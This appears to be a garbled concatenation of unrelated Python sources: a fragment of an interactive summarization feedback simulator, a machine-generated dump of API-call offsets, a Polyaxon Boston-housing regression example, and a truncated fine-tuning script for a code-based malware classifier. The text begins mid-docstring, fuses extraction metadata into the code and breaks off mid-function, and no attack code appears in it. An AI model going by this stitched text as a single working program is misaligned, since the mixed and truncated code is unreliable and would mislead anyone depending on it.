This starts of the simualted feedback for a single cluster of documents, towards a list of models. i.e. the
models get united, and then the feedback loop is simulated.
:param docs:
:param models:
:param summary_length:
:param oracle_type:
:param ub_score:
:param ub_summary:
:param parser_type:
:param parse_info:
:param max_iteration_count: int: Maximum number of iterations to run.
:param weights_override: dict: (concept -> double) dictionary containing the override weights for propagation
"""
self.models = models
self.summary_length = summary_length
self.ub_score = ub_score
self.parse_type = parser_type
self.cluster_size = len(docs)
self.MAX_WEIGHT = len(docs)
for model_name, model in models:
y = set(extract_ngrams2(model, self.stemmer, self.language, self.N))
self.ref_ngrams = self.ref_ngrams.union(y)
if parser_type == PARSE_TYPE_PARSE:
for _, parse_sents in parse_info[1]:
for parse_sent in parse_sents:
_, phrases = get_parse_info(parse_sent, self.stemmer, self.language, self.stoplist)
y = set(prune_phrases(phrases, self.stoplist, self.stemmer, self.language))
self.ref_phrases = self.ref_phrases.union(y)
self.summarizer.sentences = self.SumeWrap.load_sume_sentences(docs, parser_type, parse_info)
parse_info = []
# extract bigrams as concepts
if self.parse_type == PARSE_TYPE_PARSE:
print('Get concept types Phrases')
self.summarizer.extract_ngrams2(concept_type='phrase')
if self.parse_type == None:
print('Get concept types ngrams')
self.summarizer.extract_ngrams2(concept_type='ngrams')
# compute document frequency as concept weights
self.summarizer.compute_document_frequency()
# compute word_frequency
self.summarizer.compute_word_frequency()
old_sentences = self.summarizer.sentences
self.summarizer.prune_sentences(remove_citations=True, remove_redundancy=True, imp_list=[])
# from all concepts that are going to be pruned, keep only those that also appear elsewhere
retained_concepts = [concept for s in self.summarizer.sentences for concept in s.concepts]
print('Total concepts before sentence pruning: ', len(self.summarizer.weights))
for sentence in set(old_sentences).difference(self.summarizer.sentences):
for concept in sentence.concepts:
if concept not in retained_concepts and self.summarizer.weights.has_key(concept):
del self.summarizer.weights[concept]
print('Total concepts found: ', len(self.summarizer.weights))
if self.parse_type == None:
concept_match = [key for key in self.summarizer.weights if key in self.ref_ngrams]
print('Total ref concepts: ', len(self.ref_ngrams))
elif self.parse_type == PARSE_TYPE_PARSE:
concept_match = [key for key in self.summarizer.weights if key in self.ref_phrases]
print('Total ref concepts: ', len(self.ref_phrases))
print('UB Accept concepts: ', len(concept_match))
if oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
self.get_feature_vector()
self.data = np.array(self.fvector)
model = svm.SVC(kernel='linear', C=1.0, probability=True, class_weight='balanced')
self.initial_weights = self.summarizer.weights
self.__apply_initial_weights_override__(weights_override, clear_before_override)
'''
# create the coocurence graph
self.graph.clear()
self.graph.add_sentences(self.summarizer.sentences)
dump_dir=tempfile.mkdtemp(dir=self.debug_dump_target_dir)
'''
print('Summarizing %s sentences down to %s words' % (len(self.summarizer.sentences), self.summary_length))
# core algorithm for feedback calculation... (as in paper)
flag = 0
# get_details is the personalizedSummary function which gets updated weights in every iteration.
# Starting with boudin as starting weights (except in case of weights_override != None).
# initial iteration
summary, self.score, subset = self.get_details(1, summary_length, oracle_type)
self.prev_score = (0.0, 0.0, 0.0)
prev_summary = ''
for iteration in range(2, max_iteration_count):
self.dump_current_weight_map(self.debug_dump_target_dir, max_iteration_count)
# here, depending on the oracle_type, a intermediate summary is generated. This intermediate summary is
# satisfies other optimization criteria, so that the amount/probability of getting useful feedback is maximized
if iteration > 2:
subset = self.__generate_optimal_feedback_summary__(flag, oracle_type, summary_length)
print('Summary Subset:', subset)
# acquire feedback and record it using the flight_recorder
#new_accepts, new_rejects, new_implicits = self.get_feedback(subset, RECOMMENDER_METHOD_HIGHEST_WEIGHT)
new_accepts, new_rejects, new_implicits = self.get_feedback(subset)
self.flight_recorder.record(new_accepts, new_rejects, new_implicits)
# update the summarizer weights for next iteration
self.recalculate_weights(oracle_type, propagation)
summary, self.score, _ = self.get_details(iteration, summary_length, oracle_type)
if oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
self.uncertainity, self.labels = self.get_uncertainity_labels(model)
if self.check_break_condition(iteration, prev_summary, summary, ub_summary, self.prev_score):
break
self.prev_score = self.score
prev_summary = summary
return summary
def __generate_optimal_feedback_summary__(self, flag, oracle_type, summary_length):
"""
Generates a summary which is optimal for getting feedback on. This is done by increasing the probability of
generating a summary with unknown concepts in it. This is achieved by setting the concept weights of known
concepts (either positivly or negativly rated) to ZERO.
TODO check if :param subset is neccessary for this method
:param flag:
:param oracle_type:
:param summary_length:
:return:
"""
if oracle_type == ORACLE_TYPE_ILP_FEEDBACK or oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
feedback = self.flight_recorder.union().accept | self.flight_recorder.union().reject
"""
if self.parse_type == PARSE_TYPE_PARSE:
feedback = self.project_phrase_ngrams(feedback)
"""
non_feedback = self.summarizer.weights.viewkeys() - feedback
print("GeOpFeSu: Feedback Size:", len(feedback), len(non_feedback),
'Total:', len(self.summarizer.weights.keys()))
if (self.flight_recorder.latest().accept or len(feedback) == 0) and flag == 0:
if oracle_type == ORACLE_TYPE_ILP_FEEDBACK:
_, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback))
if oracle_type == ORACLE_TYPE_ACTIVE_LEARNING:
_, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback), self.uncertainity)
if oracle_type == ORACLE_TYPE_ACTIVE_LEARNING2:
_, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback), self.uncertainity, self.labels)
print('Subset after AL2', subset)
if not subset:
flag = 1
print('Solving regular ILP')
_, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
else:
print('Solving regular ILP')
_, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
else:
print('Solving regular ILP')
_, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
return subset
def __apply_initial_weights_override__(self, weights_override={}, clear_before_override=None):
"""
:param clear_before_override: bool: if True, all weights are set to a default value, no matter what.
:param weights_override:
"""
if (weights_override):
if clear_before_override is not None:
print("Clearing summarizer weights")
for k, v in self.summarizer.weights.iteritems():
self.summarizer.weights[k] = float(clear_before_override)
print("Overriding weights")
for k, v in weights_override.iteritems():
if self.summarizer.weights.has_key(k):
print("Overriding summarizer weight for '%s' with '%s' (was '%s')" % (
k, v, self.summarizer.weights[k]))
self.summarizer.weights[k] = v
def dump_current_weight_map(self, dump_dir=tempfile.mkdtemp(), iteration=0):
"""
:param dump_dir: directory (has to exist) where the weight map should be stored.
:param iteration: current iteration
@type dump_dir: str
@type iteration: int
"""
json_content = json.dumps(self.summarizer.weights)
prefix = "weights-%s-" % iteration
_, file = tempfile.mkstemp(suffix=".json", prefix=prefix, dir=dump_dir)
print("Dumping weights to %s" % file)
write_to_file(json_content, file)
| [
"random.sample",
"json.dumps",
"sklearn.svm.SVC",
"pulp.lpSum",
"os.path.abspath",
"summarizer.utils.data_helpers.get_parse_info",
"tempfile.mkdtemp",
"summarizer.utils.data_helpers.prune_phrases",
"pulp.LpProblem",
"itertools.chain",
"re.search",
"re.sub",
"pulp.CPLEX",
"pulp.value",
"s... | [((2511, 2546), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""simufee-"""'}), "(prefix='simufee-')\n", (2527, 2546), False, 'import tempfile\n'), ((2687, 2705), 'summarizer.baselines.sume_wrap.SumeWrap', 'SumeWrap', (['language'], {}), '(language)\n', (2695, 2705), False, 'from summarizer.baselines.sume_wrap import SumeWrap\n'), ((2801, 2846), 'summarizer.baselines.sume.ConceptBasedILPSummarizer', 'sume.ConceptBasedILPSummarizer', (['""" """', 'language'], {}), "(' ', language)\n", (2831, 2846), False, 'from summarizer.baselines import sume\n'), ((3228, 3244), 'summarizer.algorithms.flight_recorder.FlightRecorder', 'FlightRecorder', ([], {}), '()\n', (3242, 3244), False, 'from summarizer.algorithms.flight_recorder import FlightRecorder, Record\n'), ((5170, 5220), 'summarizer.algorithms.feedback_graph.PageRankFeedbackGraph', 'PageRankFeedbackGraph', (['self.stemmer', 'self.language'], {}), '(self.stemmer, self.language)\n', (5191, 5220), False, 'from summarizer.algorithms.feedback_graph import SimpleNgramFeedbackGraph, PageRankFeedbackGraph\n'), ((8170, 8218), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['new_rejects', 'self.stoplist', 'self.N'], {}), '(new_rejects, self.stoplist, self.N)\n', (8182, 8218), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((8241, 8289), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['new_accepts', 'self.stoplist', 'self.N'], {}), '(new_accepts, self.stoplist, self.N)\n', (8253, 8289), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((9636, 9674), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['s', 'self.stoplist', 'self.N'], {}), '(s, self.stoplist, self.N)\n', (9648, 9674), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((19127, 19191), 'pulp.LpProblem', 'pulp.LpProblem', (['self.summarizer.input_directory', 'pulp.LpMaximize'], {}), '(self.summarizer.input_directory, pulp.LpMaximize)\n', (19141, 19191), False, 'import pulp\n'), ((32083, 32100), 'numpy.where', 'np.where', (['(Y == -1)'], {}), '(Y == -1)\n', (32091, 32100), True, 'import numpy as np\n'), ((32121, 32137), 'numpy.where', 'np.where', (['(Y > -1)'], {}), '(Y > -1)\n', (32129, 32137), True, 'import numpy as np\n'), ((43073, 43091), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (43089, 43091), False, 'import tempfile\n'), ((43347, 43382), 'json.dumps', 'json.dumps', (['self.summarizer.weights'], {}), '(self.summarizer.weights)\n', (43357, 43382), False, 'import json\n'), ((43444, 43505), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".json"""', 'prefix': 'prefix', 'dir': 'dump_dir'}), "(suffix='.json', prefix=prefix, dir=dump_dir)\n", (43460, 43505), False, 'import tempfile\n'), ((43560, 43593), 'summarizer.utils.writer.write_to_file', 'write_to_file', (['json_content', 'file'], {}), '(json_content, file)\n', (43573, 43593), False, 'from summarizer.utils.writer import write_to_file\n'), ((3713, 3743), 'nltk.stem.snowball.SnowballStemmer', 'SnowballStemmer', (['self.language'], {}), '(self.language)\n', (3728, 3743), False, 'from nltk.stem.snowball import SnowballStemmer\n'), ((3832, 3862), 'nltk.stem.snowball.SnowballStemmer', 'SnowballStemmer', (['self.language'], {}), '(self.language)\n', (3847, 3862), False, 'from nltk.stem.snowball import SnowballStemmer\n'), ((3891, 3921), 'nltk.corpus.stopwords.words', 'stopwords.words', (['self.language'], {}), '(self.language)\n', (3906, 3921), False, 'from nltk.corpus import stopwords\n'), ((23974, 24000), 'pulp.value', 'pulp.value', (['prob.objective'], {}), '(prob.objective)\n', (23984, 24000), False, 'import pulp\n'), ((37069, 37091), 'numpy.array', 'np.array', (['self.fvector'], {}), '(self.fvector)\n', (37077, 37091), True, 'import numpy as np\n'), ((37112, 37186), 'sklearn.svm.SVC', 'svm.SVC', ([], {'kernel': '"""linear"""', 'C': '(1.0)', 'probability': '(True)', 'class_weight': '"""balanced"""'}), "(kernel='linear', C=1.0, probability=True, class_weight='balanced')\n", (37119, 37186), False, 'from sklearn import svm\n'), ((168, 190), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (180, 190), True, 'import os.path as path\n'), ((7112, 7145), 'itertools.chain', 'itertools.chain', (['*summary_phrases'], {}), '(*summary_phrases)\n', (7127, 7145), False, 'import itertools\n'), ((7662, 7731), 'random.sample', 'random.sample', (['samples', 'self.allowed_number_of_feedback_per_iteration'], {}), '(samples, self.allowed_number_of_feedback_per_iteration)\n', (7675, 7731), False, 'import random\n'), ((23233, 23273), 'pulp.lpSum', 'pulp.lpSum', (['[s[j] for j in sentence_set]'], {}), '([s[j] for j in sentence_set])\n', (23243, 23273), False, 'import pulp\n'), ((23446, 23463), 'pulp.CPLEX', 'pulp.CPLEX', ([], {'msg': '(0)'}), '(msg=0)\n', (23456, 23463), False, 'import pulp\n'), ((34420, 34479), 'summarizer.utils.data_helpers.extract_ngrams2', 'extract_ngrams2', (['model', 'self.stemmer', 'self.language', 'self.N'], {}), '(model, self.stemmer, self.language, self.N)\n', (34435, 34479), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((5939, 5993), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % key)", "(u'%s' % phrase)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % key, u'%s' % phrase)\n", (5948, 5993), False, 'import re\n'), ((5999, 6053), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % phrase)", "(u'%s' % key)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % phrase, u'%s' % key)\n", (6008, 6053), False, 'import re\n'), ((7393, 7427), 'itertools.chain', 'itertools.chain', (['*summary_concepts'], {}), '(*summary_concepts)\n', (7408, 7427), False, 'import itertools\n'), ((23047, 23103), 'pulp.lpSum', 'pulp.lpSum', (['(s[j] for j in self.summarizer.w2s[tokens[k]])'], {}), '(s[j] for j in self.summarizer.w2s[tokens[k]])\n', (23057, 23103), False, 'import pulp\n'), ((31080, 31134), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % key)", "(u'%s' % phrase)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % key, u'%s' % phrase)\n", (31089, 31134), False, 'import re\n'), ((31140, 31194), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % phrase)", "(u'%s' % key)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % phrase, u'%s' % key)\n", (31149, 31194), False, 'import re\n'), ((23593, 23611), 'pulp.GUROBI', 'pulp.GUROBI', ([], {'msg': '(0)'}), '(msg=0)\n', (23604, 23611), False, 'import pulp\n'), ((23728, 23759), 'sys.exit', 'sys.exit', (['"""no solver specified"""'], {}), "('no solver specified')\n", (23736, 23759), False, 'import sys\n'), ((34725, 34795), 'summarizer.utils.data_helpers.get_parse_info', 'get_parse_info', (['parse_sent', 'self.stemmer', 'self.language', 'self.stoplist'], {}), '(parse_sent, self.stemmer, self.language, self.stoplist)\n', (34739, 34795), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((23675, 23691), 'pulp.GLPK', 'pulp.GLPK', ([], {'msg': '(0)'}), '(msg=0)\n', (23684, 23691), False, 'import pulp\n'), ((29445, 29459), 'numpy.array', 'np.array', (['embd'], {}), '(embd)\n', (29453, 29459), True, 'import numpy as np\n'), ((29520, 29534), 'numpy.array', 'np.array', (['[-1]'], {}), '([-1])\n', (29528, 29534), True, 'import numpy as np\n'), ((34828, 34894), 'summarizer.utils.data_helpers.prune_phrases', 'prune_phrases', (['phrases', 'self.stoplist', 'self.stemmer', 'self.language'], {}), '(phrases, self.stoplist, self.stemmer, self.language)\n', (34841, 34894), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((25573, 25612), 're.sub', 're.sub', (['u"""[-\\\\.](\\\\s|$)"""', 'u"""\\\\1"""', 'token'], {}), "(u'[-\\\\.](\\\\s|$)', u'\\\\1', token)\n", (25579, 25612), False, 'import re\n'), ((25647, 25683), 're.sub', 're.sub', (['u"""([^.])[.]$"""', 'u"""\\\\1"""', 'token'], {}), "(u'([^.])[.]$', u'\\\\1', token)\n", (25653, 25683), False, 'import re\n')] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import numpy as np
from polyaxon_schemas.optimizers import SGDConfig
import polyaxon_lib as plx
import tensorflow as tf
from polyaxon_schemas.losses import MeanSquaredErrorConfig
from sklearn import datasets
from sklearn import model_selection
from sklearn import preprocessing
from tensorflow.python.estimator.inputs.numpy_io import numpy_input_fn
def main(*args):
"""Creates an estimator for the boston house-prices datase.
References:
* This dataset concerns housing values in Boston suburbs.
It's based on the "Boston Housing Dataset" from University of California, Irvine,
which in turn was taken from the StatLib library maintained at Carnegie Mellon University.
Returns:
* https://archive.ics.uci.edu/ml/datasets/Housing
"""
# Load dataset
boston = datasets.load_boston()
x, y = boston.data, boston.target
# Split dataset into train / test
x_train, x_test, y_train, y_test = model_selection.train_test_split(
x, y, test_size=0.2, random_state=42)
# Scale data (training set) to 0 mean and unit standard deviation.
scaler = preprocessing.StandardScaler()
x_train = scaler.fit_transform(x_train)
def graph_fn(mode, features):
x = plx.layers.Dense(units=32, activation='relu')(features['x'])
x = plx.layers.Dropout(rate=0.3)(x)
x = plx.layers.Dense(units=32, activation='relu')(x)
x = plx.layers.Dropout(rate=0.3)(x)
x = plx.layers.Dense(units=1)(x)
return plx.layers.Dropout(rate=0.3)(x)
def model_fn(features, labels, mode):
model = plx.models.Regressor(
mode, graph_fn=graph_fn,
loss=MeanSquaredErrorConfig(),
optimizer=SGDConfig(learning_rate=0.001),
summaries='all')
return model(features, labels)
estimator = plx.estimators.Estimator(model_fn=model_fn,
model_dir="/tmp/polyaxon_logs/boston")
estimator.train(input_fn=numpy_input_fn(
{'x': np.asarray(x_train, dtype=np.float32)}, np.expand_dims(y_train, axis=1),
shuffle=False, num_epochs=5000, batch_size=64))
x_test = scaler.transform(x_test)
estimator.evaluate(input_fn=numpy_input_fn(
{'x': np.asarray(x_test, dtype=np.float32)}, np.expand_dims(y_test, axis=1),
shuffle=False, num_epochs=1, batch_size=32))
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [
"polyaxon_lib.layers.Dense",
"sklearn.preprocessing.StandardScaler",
"sklearn.model_selection.train_test_split",
"numpy.asarray",
"polyaxon_lib.estimators.Estimator",
"polyaxon_schemas.optimizers.SGDConfig",
"tensorflow.logging.set_verbosity",
"polyaxon_schemas.losses.MeanSquaredErrorConfig",
"numpy... | [((912, 934), 'sklearn.datasets.load_boston', 'datasets.load_boston', ([], {}), '()\n', (932, 934), False, 'from sklearn import datasets\n'), ((1051, 1121), 'sklearn.model_selection.train_test_split', 'model_selection.train_test_split', (['x', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(x, y, test_size=0.2, random_state=42)\n', (1083, 1121), False, 'from sklearn import model_selection\n'), ((1216, 1246), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (1244, 1246), False, 'from sklearn import preprocessing\n'), ((1936, 2023), 'polyaxon_lib.estimators.Estimator', 'plx.estimators.Estimator', ([], {'model_fn': 'model_fn', 'model_dir': '"""/tmp/polyaxon_logs/boston"""'}), "(model_fn=model_fn, model_dir=\n '/tmp/polyaxon_logs/boston')\n", (1960, 2023), True, 'import polyaxon_lib as plx\n'), ((2508, 2549), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (2532, 2549), True, 'import tensorflow as tf\n'), ((2554, 2566), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (2564, 2566), True, 'import tensorflow as tf\n'), ((1338, 1383), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(32)', 'activation': '"""relu"""'}), "(units=32, activation='relu')\n", (1354, 1383), True, 'import polyaxon_lib as plx\n'), ((1411, 1439), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1429, 1439), True, 'import polyaxon_lib as plx\n'), ((1455, 1500), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(32)', 'activation': '"""relu"""'}), "(units=32, activation='relu')\n", (1471, 1500), True, 'import polyaxon_lib as plx\n'), ((1516, 1544), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1534, 1544), True, 'import polyaxon_lib as plx\n'), ((1560, 1585), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(1)'}), '(units=1)\n', (1576, 1585), True, 'import polyaxon_lib as plx\n'), ((1604, 1632), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1622, 1632), True, 'import polyaxon_lib as plx\n'), ((1771, 1795), 'polyaxon_schemas.losses.MeanSquaredErrorConfig', 'MeanSquaredErrorConfig', ([], {}), '()\n', (1793, 1795), False, 'from polyaxon_schemas.losses import MeanSquaredErrorConfig\n'), ((1819, 1849), 'polyaxon_schemas.optimizers.SGDConfig', 'SGDConfig', ([], {'learning_rate': '(0.001)'}), '(learning_rate=0.001)\n', (1828, 1849), False, 'from polyaxon_schemas.optimizers import SGDConfig\n'), ((2160, 2191), 'numpy.expand_dims', 'np.expand_dims', (['y_train'], {'axis': '(1)'}), '(y_train, axis=1)\n', (2174, 2191), True, 'import numpy as np\n'), ((2390, 2420), 'numpy.expand_dims', 'np.expand_dims', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (2404, 2420), True, 'import numpy as np\n'), ((2120, 2157), 'numpy.asarray', 'np.asarray', (['x_train'], {'dtype': 'np.float32'}), '(x_train, dtype=np.float32)\n', (2130, 2157), True, 'import numpy as np\n'), ((2351, 2387), 'numpy.asarray', 'np.asarray', (['x_test'], {'dtype': 'np.float32'}), '(x_test, dtype=np.float32)\n', (2361, 2387), True, 'import numpy as np\n')] |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, BERT, RoBERTa).
GPT and GPT-2 are fine-tuned using a causal language modeling (CLM) loss while BERT and RoBERTa are fine-tuned
using a masked language modeling (MLM) loss.
"""
from __future__ import absolute_import
import os
import logging
import argparse
import math
import numpy as np
from io import open
from tqdm import tqdm
import torch
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from transformers import (WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup,
RobertaConfig, RobertaModel, RobertaTokenizer,
BartConfig, BartForConditionalGeneration, BartTokenizer,
T5Config, T5ForConditionalGeneration, T5Tokenizer)
import multiprocessing
import time
from models import MalwareModel
from configs import add_args, set_seed
from utils import get_filenames, get_elapse_time, load_and_cache_malware_data
from models import get_model_size
MODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),
't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),
'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),
'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer)}
cpu_cont = multiprocessing.cpu_count()
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
def evaluate(args, model, eval_examples, eval_data, write_to_pred=False):
eval_sampler = SequentialSampler(eval_data)
eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)
# Eval!
logger.info("***** Running evaluation *****")
logger.info(" Num examples = %d", len(eval_examples))
logger.info(" Num batches = %d", len(eval_dataloader))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
model.eval()
logits = []
labels = []
for batch in tqdm(eval_dataloader, total=len(eval_dataloader), desc="Evaluating"):
inputs = batch[0].to(args.device)
label = batch[1].to(args.device)
with torch.no_grad():
lm_loss, logit = model(inputs, label)
eval_loss += lm_loss.mean().item()
logits.append(logit.cpu().numpy())
labels.append(label.cpu().numpy())
nb_eval_steps += 1
logits = np.concatenate(logits, 0)
labels = np.concatenate(labels, 0)
preds = logits[:, 1] > 0.5
eval_acc = np.mean(labels == preds)
eval_loss = eval_loss / nb_eval_steps
perplexity = torch.tensor(eval_loss)
result = {
"eval_loss": float(perplexity),
"eval_acc": round(eval_acc, 4),
}
logger.info("***** Eval results *****")
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(round(result[key], 4)))
if write_to_pred:
with open(os.path.join(args.output_dir, "predictions.txt"), 'w') as f:
for example, pred in zip(eval_examples, preds):
if pred:
f.write(str(example.idx) + '\t1\n')
else:
f.write(str(example.idx) + '\t0\n')
return result
def main():
parser = argparse.ArgumentParser()
t0 = time.time()
args = add_args(parser)
logger.info(args)
# Setup CUDA, GPU & distributed training
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend='nccl')
args.n_gpu = 1
logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, cpu count: %d",
args.local_rank, device, args.n_gpu, bool(args.local_rank != -1), cpu_cont)
args.device = device
set_seed(args)
# Build model
config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]
config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path)
model = model_class.from_pretrained(args.model_name_or_path)
tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name)
model = MalwareModel(model, config, tokenizer, args)
logger.info("Finish loading model [%s] from %s", get_model_size(model), args.model_name_or_path)
if args.load_model_path is not None:
logger.info("Reload model from {}".format(args.load_model_path))
model.load_state_dict(torch.load(args.load_model_path))
model.to(device)
pool = multiprocessing.Pool(cpu_cont)
args.train_filename, args.dev_filename, args.test_filename = get_filenames(args.data_dir, args.task, args.sub_task)
fa = open(os.path.join(args.output_dir, 'summary.log'), 'a+')
if args.do_train:
if args.n_gpu > 1:
# multi-gpu training
model = torch.nn.DataParallel(model)
if args.local_rank in [-1, 0] and args.data_num == -1:
summary_fn = '{}/{}'.format(args.summary_dir, '/'.join(args.output_dir.split('/')[1:]))
tb_writer = SummaryWriter(summary_fn)
# Prepare training data loader
train_examples, train_data = load_and_cache_malware_data(args, args.train_filename, pool, tokenizer, 'train',
is_sample=False)
if args.local_rank == -1:
train_sampler = RandomSampler(train_data)
else:
train_sampler = DistributedSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
num_train_optimization_steps = args.num_train_epochs * len(train_dataloader)
save_steps = max(len(train_dataloader), 1)
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
'weight_decay': args.weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
if args.warmup_steps < 1:
warmup_steps = num_train_optimization_steps * args.warmup_steps
else:
warmup_steps = int(args.warmup_steps)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,
num_training_steps=num_train_optimization_steps)
# Start training
train_example_num = len(train_data)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", train_example_num)
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Batch num = %d", math.ceil(train_example_num / args.train_batch_size))
logger.info(" Num epoch = %d", args.num_train_epochs)
global_step, best_acc = 0, 0
not_acc_inc_cnt = 0
is_early_stop = False
for cur_epoch in range(args.start_epoch, int(args.num_train_epochs)):
bar = tqdm(train_dataloader, total=len(train_dataloader), desc="Training")
nb_tr_examples, nb_tr_steps, tr_loss = 0, 0, 0
model.train()
for step, batch in enumerate(bar):
batch = tuple(t.to(device) for t in batch)
source_ids, labels = batch
loss, logits = model(source_ids, labels)
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu.
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
tr_loss += loss.item()
nb_tr_examples += source_ids.size(0)
nb_tr_steps += 1
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
if nb_tr_steps % args.gradient_accumulation_steps == 0:
# Update parameters
optimizer.step()
optimizer.zero_grad()
scheduler.step()
global_step += 1
train_loss = round(tr_loss * args.gradient_accumulation_steps / nb_tr_steps, 4)
bar.set_description("[{}] Train loss {}".format(cur_epoch, round(train_loss, 3)))
if (step + 1) % save_steps == 0 and args.do_eval:
logger.info("***** CUDA.empty_cache() *****")
torch.cuda.empty_cache()
eval_examples, eval_data = load_and_cache_malware_data(args, args.dev_filename, pool, tokenizer,
'valid', is_sample=False)
result = evaluate(args, model, eval_examples, eval_data)
eval_acc = result['eval_acc']
if args.data_num == -1:
tb_writer.add_scalar('dev_acc', round(eval_acc, 4), cur_epoch)
# save last checkpoint
last_output_dir = os.path.join(args.output_dir, 'checkpoint-last')
if not os.path.exists(last_output_dir):
os.makedirs(last_output_dir)
if True or args.data_num == -1 and args.save_last_checkpoints:
model_to_save = model.module if hasattr(model, 'module') else model
output_model_file = os.path.join(last_output_dir, "pytorch_model.bin")
torch.save(model_to_save.state_dict(), output_model_file)
